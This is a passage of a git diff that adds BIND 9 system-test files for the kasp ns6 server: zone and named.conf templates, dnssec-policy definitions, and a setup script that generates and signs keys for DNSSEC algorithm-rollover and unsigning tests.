@@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 400 +@ IN SOA mname1. . ( + 3 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns6 +ns6 A 10.53.0.6 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 diff --git a/bin/tests/system/kasp/ns6/named.conf.in b/bin/tests/system/kasp/ns6/named.conf.in new file mode 100644 index 0000000..cb9bd27 --- /dev/null +++ b/bin/tests/system/kasp/ns6/named.conf.in @@ -0,0 +1,97 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS6 + +include "policies/kasp.conf"; +include "policies/csk1.conf"; + +options { + query-source address 10.53.0.6; + notify-source 10.53.0.6; + transfer-source 10.53.0.6; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.6; }; + listen-on-v6 { none; }; + allow-transfer { any; }; + recursion no; + key-directory "."; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +/* This zone switch from dynamic to inline-signing. */ +zone "dynamic2inline.kasp" { + type primary; + file "dynamic2inline.kasp.db"; + allow-update { any; }; + dnssec-policy "default"; +}; + +/* These zones are going insecure. */ +zone "step1.going-insecure.kasp" { + type master; + file "step1.going-insecure.kasp.db"; + inline-signing yes; + dnssec-policy "unsigning"; +}; + +zone "step1.going-insecure-dynamic.kasp" { + type master; + file "step1.going-insecure-dynamic.kasp.db"; + dnssec-policy "unsigning"; + allow-update { any; }; +}; + +zone "step1.going-straight-to-none.kasp" { + type master; + file "step1.going-straight-to-none.kasp.db"; + inline-signing yes; + dnssec-policy "default"; +}; + +/* These are alorithm rollover test zones. */ +zone "step1.algorithm-roll.kasp" { + type primary; + file "step1.algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "rsasha256"; +}; + +zone "step1.csk-algorithm-roll.kasp" { + type primary; + file "step1.csk-algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "csk-algoroll"; +}; + +dnssec-policy "modified" { + keys { + csk lifetime unlimited algorithm rsasha256 2048; + }; +}; + +zone example { + type primary; + file "example.db"; + inline-signing yes; + dnssec-policy modified; +}; diff --git a/bin/tests/system/kasp/ns6/named2.conf.in b/bin/tests/system/kasp/ns6/named2.conf.in new file mode 100644 index 0000000..5f4097e --- /dev/null +++ b/bin/tests/system/kasp/ns6/named2.conf.in @@ -0,0 +1,185 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS6 + +include "policies/kasp.conf"; +include "policies/csk2.conf"; + +options { + query-source address 10.53.0.6; + notify-source 10.53.0.6; + transfer-source 10.53.0.6; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.6; }; + listen-on-v6 { none; }; + allow-transfer { any; }; + recursion no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +/* This zone switch from dynamic to inline-signing. */ +zone "dynamic2inline.kasp" { + type primary; + file "dynamic2inline.kasp.db"; + allow-update { any; }; + inline-signing yes; + dnssec-policy "default"; +}; + +/* Zones for testing going insecure. */ +zone "step1.going-insecure.kasp" { + type master; + file "step1.going-insecure.kasp.db"; + inline-signing yes; + dnssec-policy "insecure"; +}; + +zone "step2.going-insecure.kasp" { + type master; + file "step2.going-insecure.kasp.db"; + inline-signing yes; + dnssec-policy "insecure"; +}; + +zone "step1.going-insecure-dynamic.kasp" { + type master; + file "step1.going-insecure-dynamic.kasp.db"; + dnssec-policy "insecure"; + allow-update { any; }; +}; + +zone "step2.going-insecure-dynamic.kasp" { + type master; + file "step2.going-insecure-dynamic.kasp.db"; + dnssec-policy "insecure"; + allow-update { any; }; +}; + +zone "step1.going-straight-to-none.kasp" { + type master; + file "step1.going-straight-to-none.kasp.db"; + dnssec-policy "none"; +}; + +/* + * Zones for testing KSK/ZSK algorithm roll. + */ +zone "step1.algorithm-roll.kasp" { + type primary; + file "step1.algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "ecdsa256"; +}; + +zone "step2.algorithm-roll.kasp" { + type primary; + file "step2.algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "ecdsa256"; +}; + +zone "step3.algorithm-roll.kasp" { + type primary; + file "step3.algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "ecdsa256"; +}; + +zone "step4.algorithm-roll.kasp" { + type primary; + file "step4.algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "ecdsa256"; +}; + +zone "step5.algorithm-roll.kasp" { + type primary; + file "step5.algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "ecdsa256"; +}; + +zone "step6.algorithm-roll.kasp" { + type primary; + file "step6.algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "ecdsa256"; +}; + +/* + * Zones for testing CSK algorithm roll. + */ +zone "step1.csk-algorithm-roll.kasp" { + type primary; + file "step1.csk-algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "csk-algoroll"; +}; + +zone "step2.csk-algorithm-roll.kasp" { + type primary; + file "step2.csk-algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "csk-algoroll"; +}; + +zone "step3.csk-algorithm-roll.kasp" { + type primary; + file "step3.csk-algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "csk-algoroll"; +}; + +zone "step4.csk-algorithm-roll.kasp" { + type primary; + file "step4.csk-algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "csk-algoroll"; +}; + +zone "step5.csk-algorithm-roll.kasp" { + type primary; + file "step5.csk-algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "csk-algoroll"; +}; + +zone "step6.csk-algorithm-roll.kasp" { + type primary; + file "step6.csk-algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "csk-algoroll"; +}; + +dnssec-policy "modified" { + keys { + csk lifetime unlimited algorithm rsasha256 2048; + }; +}; + +zone example { + type primary; + file "example.db"; + inline-signing yes; + dnssec-policy modified; +}; diff --git a/bin/tests/system/kasp/ns6/policies/csk1.conf.in b/bin/tests/system/kasp/ns6/policies/csk1.conf.in new file mode 100644 index 0000000..a5ff042 --- /dev/null +++ b/bin/tests/system/kasp/ns6/policies/csk1.conf.in @@ -0,0 +1,30 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dnssec-policy "csk-algoroll" { + signatures-refresh P5D; + signatures-validity 30d; + signatures-validity-dnskey 30d; + + keys { + csk lifetime unlimited algorithm rsasha256; + }; + + dnskey-ttl 1h; + publish-safety PT1H; + retire-safety 2h; + zone-propagation-delay 3600; + max-zone-ttl 6h; + parent-propagation-delay pt1h; + parent-ds-ttl 7200; +}; diff --git a/bin/tests/system/kasp/ns6/policies/csk2.conf.in b/bin/tests/system/kasp/ns6/policies/csk2.conf.in new file mode 100644 index 0000000..6d290c3 --- /dev/null +++ b/bin/tests/system/kasp/ns6/policies/csk2.conf.in @@ -0,0 +1,30 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dnssec-policy "csk-algoroll" { + signatures-refresh P5D; + signatures-validity 30d; + signatures-validity-dnskey 30d; + + keys { + csk lifetime unlimited algorithm @DEFAULT_ALGORITHM@; + }; + + dnskey-ttl 1h; + publish-safety PT1H; + retire-safety 2h; + zone-propagation-delay 3600; + max-zone-ttl 6h; + parent-propagation-delay pt1h; + parent-ds-ttl 7200; +}; diff --git a/bin/tests/system/kasp/ns6/policies/kasp-fips.conf.in b/bin/tests/system/kasp/ns6/policies/kasp-fips.conf.in new file mode 100644 index 0000000..810b91d --- /dev/null +++ b/bin/tests/system/kasp/ns6/policies/kasp-fips.conf.in @@ -0,0 +1,63 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dnssec-policy "unsigning" { + dnskey-ttl 7200; + + keys { + ksk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@; + zsk key-directory lifetime P60D algorithm @DEFAULT_ALGORITHM@; + }; +}; + +dnssec-policy "nsec3" { + nsec3param iterations 0 optout no salt-length 0; +}; + +dnssec-policy "rsasha256" { + signatures-refresh P5D; + signatures-validity 30d; + signatures-validity-dnskey 30d; + + keys { + ksk lifetime unlimited algorithm rsasha256; + zsk lifetime unlimited algorithm rsasha256; + }; + + dnskey-ttl 1h; + publish-safety PT1H; + retire-safety 2h; + zone-propagation-delay 3600; + max-zone-ttl 6h; + parent-propagation-delay pt1h; + parent-ds-ttl 7200; +}; + +dnssec-policy "ecdsa256" { + signatures-refresh P5D; + signatures-validity 30d; + signatures-validity-dnskey 30d; + + keys { + ksk lifetime unlimited algorithm ecdsa256; + zsk lifetime unlimited algorithm ecdsa256; + }; + + dnskey-ttl 1h; + publish-safety PT1H; + retire-safety 2h; + zone-propagation-delay 3600; + max-zone-ttl 6h; + parent-propagation-delay pt1h; + parent-ds-ttl 7200; +}; diff --git a/bin/tests/system/kasp/ns6/policies/kasp.conf.in b/bin/tests/system/kasp/ns6/policies/kasp.conf.in new file mode 100644 index 0000000..d634b76 --- /dev/null +++ b/bin/tests/system/kasp/ns6/policies/kasp.conf.in @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "policies/kasp-fips.conf"; + +dnssec-policy "rsasha1" { + signatures-refresh P5D; + signatures-validity 30d; + signatures-validity-dnskey 30d; + + keys { + ksk lifetime unlimited algorithm rsasha1; + zsk lifetime unlimited algorithm rsasha1; + }; + + dnskey-ttl 1h; + publish-safety PT1H; + retire-safety 2h; + zone-propagation-delay 3600; + max-zone-ttl 6h; + parent-propagation-delay pt1h; + parent-ds-ttl 7200; +}; diff --git a/bin/tests/system/kasp/ns6/setup.sh b/bin/tests/system/kasp/ns6/setup.sh new file mode 100644 index 0000000..3a18750 --- /dev/null +++ b/bin/tests/system/kasp/ns6/setup.sh @@ -0,0 +1,409 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +echo_i "ns6/setup.sh" + +setup() { + zone="$1" + echo_i "setting up zone: $zone" + zonefile="${zone}.db" + infile="${zone}.db.infile" +} + +# Make lines shorter by storing key states in environment variables. +H="HIDDEN" +R="RUMOURED" +O="OMNIPRESENT" +U="UNRETENTIVE" + +# The child zones (step1, step2) beneath these zones represent the various +# steps of unsigning a zone. +for zn in going-insecure.kasp going-insecure-dynamic.kasp +do + # Step 1: + # Set up a zone with dnssec-policy that is going insecure. + setup step1.$zn + echo "$zone" >> zones + T="now-10d" + ksktimes="-P $T -A $T -P sync $T" + zsktimes="-P $T -A $T" + KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) + ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 $zsktimes $zone 2> keygen.out.$zone.2) + cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" + private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" + private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" + cp $infile $zonefile + $SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + + # Step 2: + # Set up a zone with dnssec-policy that is going insecure. Don't add + # this zone to the zones file, because this zone is no longer expected + # to be fully signed. + setup step2.$zn + # The DS was withdrawn from the parent zone 26 hours ago. + Trem="now-26h" + ksktimes="-P $T -A $T -P sync $T" + zsktimes="-P $T -A $T" + KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) + ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 $zsktimes $zone 2> keygen.out.$zone.2) + $SETTIME -s -g $H -k $O $T -r $O $T -d $U $Trem -D ds $Trem "$KSK" > settime.out.$zone.1 2>&1 + $SETTIME -s -g $H -k $O $T -z $O $T "$ZSK" > settime.out.$zone.2 2>&1 + # Fake lifetime of old algorithm keys. + echo "Lifetime: 0" >> "${KSK}.state" + echo "Lifetime: 5184000" >> "${ZSK}.state" + cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" + private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" + private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" + cp $infile $zonefile + $SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 +done + +# This zone is going straight to "none" policy. This is undefined behavior. +setup step1.going-straight-to-none.kasp +echo "$zone" >> zones +TactN="now" +csktimes="-P ${TactN} -A ${TactN} -P sync ${TactN}" +CSK=$($KEYGEN -k default $csktimes $zone 2> keygen.out.$zone.1) +$SETTIME -s -g $O -k $O $TactN -z $O $TactN -r $O $TactN -d $O $TactN "$CSK" > settime.out.$zone.1 2>&1 +cat template.db.in "${CSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# +# The zones at algorithm-roll.kasp represent the various steps of a ZSK/KSK +# algorithm rollover. +# + +# Step 1: +# Introduce the first key. This will immediately be active. +setup step1.algorithm-roll.kasp +echo "$zone" >> zones +TactN="now" +ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN}" +zsktimes="-P ${TactN} -A ${TactN}" +KSK=$($KEYGEN -a RSASHA256 -L 3600 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a RSASHA256 -L 3600 $zsktimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TactN -z $O $TactN "$ZSK" > settime.out.$zone.2 2>&1 +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone 8 "$KSK" >> "$infile" +private_type_record $zone 8 "$ZSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 2: +# After the publication interval has passed the DNSKEY is OMNIPRESENT. +setup step2.algorithm-roll.kasp +# The time passed since the new algorithm keys have been introduced is 3 hours. +TactN="now-3h" +TpubN1="now-3h" +# Tsbm(N+1) = TpubN1 + Ipub = now + TTLsig + Dprp + publish-safety = +# now - 3h + 6h + 1h + 1h = now + 5h +TsbmN1="now+5h" +ksk1times="-P ${TactN} -A ${TactN} -P sync ${TactN} -I now" +zsk1times="-P ${TactN} -A ${TactN} -I now" +ksk2times="-P ${TpubN1} -A ${TpubN1} -P sync ${TsbmN1}" +zsk2times="-P ${TpubN1} -A ${TpubN1}" +KSK1=$($KEYGEN -a RSASHA256 -L 3600 -f KSK $ksk1times $zone 2> keygen.out.$zone.1) +ZSK1=$($KEYGEN -a RSASHA256 -L 3600 $zsk1times $zone 2> keygen.out.$zone.2) +KSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksk2times $zone 2> keygen.out.$zone.3) +ZSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsk2times $zone 2> keygen.out.$zone.4) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -d $O $TactN "$KSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $H -k $O $TactN -z $O $TactN "$ZSK1" > settime.out.$zone.2 2>&1 +$SETTIME -s -g $O -k $R $TpubN1 -r $R $TpubN1 -d $H $TpubN1 "$KSK2" > settime.out.$zone.3 2>&1 +$SETTIME -s -g $O -k $R $TpubN1 -z $R $TpubN1 "$ZSK2" > settime.out.$zone.4 2>&1 +# Fake lifetime of old algorithm keys. +echo "Lifetime: 0" >> "${KSK1}.state" +echo "Lifetime: 0" >> "${ZSK1}.state" +cat template.db.in "${KSK1}.key" "${ZSK1}.key" "${KSK2}.key" "${ZSK2}.key" > "$infile" +private_type_record $zone 8 "$KSK1" >> "$infile" +private_type_record $zone 8 "$ZSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK2" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 3: +# The zone signatures are also OMNIPRESENT. +setup step3.algorithm-roll.kasp +# The time passed since the new algorithm keys have been introduced is 9 hours. +TactN="now-9h" +TretN="now-6h" +TpubN1="now-9h" +TsbmN1="now-1h" +ksk1times="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN}" +zsk1times="-P ${TactN} -A ${TactN} -I ${TretN}" +ksk2times="-P ${TpubN1} -A ${TpubN1} -P sync ${TsbmN1}" +zsk2times="-P ${TpubN1} -A ${TpubN1}" +KSK1=$($KEYGEN -a RSASHA256 -L 3600 -f KSK $ksk1times $zone 2> keygen.out.$zone.1) +ZSK1=$($KEYGEN -a RSASHA256 -L 3600 $zsk1times $zone 2> keygen.out.$zone.2) +KSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksk2times $zone 2> keygen.out.$zone.3) +ZSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsk2times $zone 2> keygen.out.$zone.4) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -d $O $TactN "$KSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $H -k $O $TactN -z $O $TactN "$ZSK1" > settime.out.$zone.2 2>&1 +$SETTIME -s -g $O -k $O $TpubN1 -r $O $TpubN1 -d $H $TpubN1 "$KSK2" > settime.out.$zone.3 2>&1 +$SETTIME -s -g $O -k $O $TpubN1 -z $R $TpubN1 "$ZSK2" > settime.out.$zone.4 2>&1 +# Fake lifetime of old algorithm keys. +echo "Lifetime: 0" >> "${KSK1}.state" +echo "Lifetime: 0" >> "${ZSK1}.state" +cat template.db.in "${KSK1}.key" "${ZSK1}.key" "${KSK2}.key" "${ZSK2}.key" > "$infile" +private_type_record $zone 8 "$KSK1" >> "$infile" +private_type_record $zone 8 "$ZSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK2" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 4: +# The DS is swapped and can become OMNIPRESENT. +setup step4.algorithm-roll.kasp +# The time passed since the DS has been swapped is 29 hours. +TactN="now-38h" +TretN="now-35h" +TpubN1="now-38h" +TsbmN1="now-30h" +TactN1="now-29h" +ksk1times="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN}" +zsk1times="-P ${TactN} -A ${TactN} -I ${TretN}" +ksk2times="-P ${TpubN1} -A ${TpubN1} -P sync ${TsbmN1}" +zsk2times="-P ${TpubN1} -A ${TpubN1}" +KSK1=$($KEYGEN -a RSASHA256 -L 3600 -f KSK $ksk1times $zone 2> keygen.out.$zone.1) +ZSK1=$($KEYGEN -a RSASHA256 -L 3600 $zsk1times $zone 2> keygen.out.$zone.2) +KSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksk2times $zone 2> keygen.out.$zone.3) +ZSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsk2times $zone 2> keygen.out.$zone.4) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -d $U $TactN1 -D ds $TactN1 "$KSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $H -k $O $TactN -z $O $TactN "$ZSK1" > settime.out.$zone.2 2>&1 +$SETTIME -s -g $O -k $O $TpubN1 -r $O $TpubN1 -d $R $TactN1 -P ds $TactN1 "$KSK2" > settime.out.$zone.3 2>&1 +$SETTIME -s -g $O -k $O $TpubN1 -z $R $TpubN1 "$ZSK2" > settime.out.$zone.4 2>&1 +# Fake lifetime of old algorithm keys. +echo "Lifetime: 0" >> "${KSK1}.state" +echo "Lifetime: 0" >> "${ZSK1}.state" +cat template.db.in "${KSK1}.key" "${ZSK1}.key" "${KSK2}.key" "${ZSK2}.key" > "$infile" +private_type_record $zone 8 "$KSK1" >> "$infile" +private_type_record $zone 8 "$ZSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK2" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 5: +# The DNSKEY is removed long enough to be HIDDEN. +setup step5.algorithm-roll.kasp +# The time passed since the DNSKEY has been removed is 2 hours. +TactN="now-40h" +TretN="now-37h" +TremN="now-2h" +TpubN1="now-40h" +TsbmN1="now-32h" +TactN1="now-31h" +ksk1times="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN}" +zsk1times="-P ${TactN} -A ${TactN} -I ${TretN}" +ksk2times="-P ${TpubN1} -A ${TpubN1} -P sync ${TsbmN1}" +zsk2times="-P ${TpubN1} -A ${TpubN1}" +KSK1=$($KEYGEN -a RSASHA256 -L 3600 -f KSK $ksk1times $zone 2> keygen.out.$zone.1) +ZSK1=$($KEYGEN -a RSASHA256 -L 3600 $zsk1times $zone 2> keygen.out.$zone.2) +KSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksk2times $zone 2> keygen.out.$zone.3) +ZSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsk2times $zone 2> keygen.out.$zone.4) +$SETTIME -s -g $H -k $U $TremN -r $U $TremN -d $H $TactN1 "$KSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $H -k $U $TremN -z $U $TremN "$ZSK1" > settime.out.$zone.2 2>&1 +$SETTIME -s -g $O -k $O $TpubN1 -r $O $TpubN1 -d $O $TactN1 "$KSK2" > settime.out.$zone.3 2>&1 +$SETTIME -s -g $O -k $O $TpubN1 -z $R $TpubN1 "$ZSK2" > settime.out.$zone.4 2>&1 +# Fake lifetime of old algorithm keys. +echo "Lifetime: 0" >> "${KSK1}.state" +echo "Lifetime: 0" >> "${ZSK1}.state" +cat template.db.in "${KSK1}.key" "${ZSK1}.key" "${KSK2}.key" "${ZSK2}.key" > "$infile" +private_type_record $zone 8 "$KSK1" >> "$infile" +private_type_record $zone 8 "$ZSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK2" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 6: +# The RRSIGs have been removed long enough to be HIDDEN. +setup step6.algorithm-roll.kasp +# Additional time passed: 7h. +TactN="now-47h" +TretN="now-44h" +TremN="now-7h" +TpubN1="now-47h" +TsbmN1="now-39h" +TactN1="now-38h" +TdeaN="now-9h" +ksk1times="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN}" +zsk1times="-P ${TactN} -A ${TactN} -I ${TretN}" +ksk2times="-P ${TpubN1} -A ${TpubN1} -P sync ${TsbmN1}" +zsk2times="-P ${TpubN1} -A ${TpubN1}" +KSK1=$($KEYGEN -a RSASHA256 -L 3600 -f KSK $ksk1times $zone 2> keygen.out.$zone.1) +ZSK1=$($KEYGEN -a RSASHA256 -L 3600 $zsk1times $zone 2> keygen.out.$zone.2) +KSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksk2times $zone 2> keygen.out.$zone.3) +ZSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsk2times $zone 2> keygen.out.$zone.4) +$SETTIME -s -g $H -k $H $TremN -r $U $TdeaN -d $H $TactN1 "$KSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $H -k $H $TremN -z $U $TdeaN "$ZSK1" > settime.out.$zone.2 2>&1 +$SETTIME -s -g $O -k $O $TpubN1 -r $O $TpubN1 -d $O $TactN1 "$KSK2" > settime.out.$zone.3 2>&1 +$SETTIME -s -g $O -k $O $TpubN1 -z $R $TpubN1 "$ZSK2" > settime.out.$zone.4 2>&1 +# Fake lifetime of old algorithm keys. +echo "Lifetime: 0" >> "${KSK1}.state" +echo "Lifetime: 0" >> "${ZSK1}.state" +cat template.db.in "${KSK1}.key" "${ZSK1}.key" "${KSK2}.key" "${ZSK2}.key" > "$infile" +private_type_record $zone 8 "$KSK1" >> "$infile" +private_type_record $zone 8 "$ZSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK2" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# +# The zones at csk-algorithm-roll.kasp represent the various steps of a CSK +# algorithm rollover. +# + +# Step 1: +# Introduce the first key. This will immediately be active. +setup step1.csk-algorithm-roll.kasp +echo "$zone" >> zones +TactN="now" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN}" +CSK=$($KEYGEN -k csk-algoroll -l policies/csk1.conf $csktimes $zone 2> keygen.out.$zone.1) +$SETTIME -s -g $O -k $O $TactN -r $O $TactN -z $O $TactN -d $O $TactN "$CSK" > settime.out.$zone.1 2>&1 +cat template.db.in "${CSK}.key" > "$infile" +private_type_record $zone 5 "$CSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -z -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 2: +# After the publication interval has passed the DNSKEY is OMNIPRESENT. +setup step2.csk-algorithm-roll.kasp +# The time passed since the new algorithm keys have been introduced is 3 hours. +TactN="now-3h" +TpubN1="now-3h" +csktimes="-P ${TactN} -A ${TactN} -P sync ${TactN} -I now" +newtimes="-P ${TpubN1} -A ${TpubN1}" +CSK1=$($KEYGEN -k csk-algoroll -l policies/csk1.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-algoroll -l policies/csk2.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -z $O $TactN -d $O $TactN "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $R $TpubN1 -r $R $TpubN1 -z $R $TpubN1 -d $H $TpubN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Fake lifetime of old algorithm keys. +echo "Lifetime: 0" >> 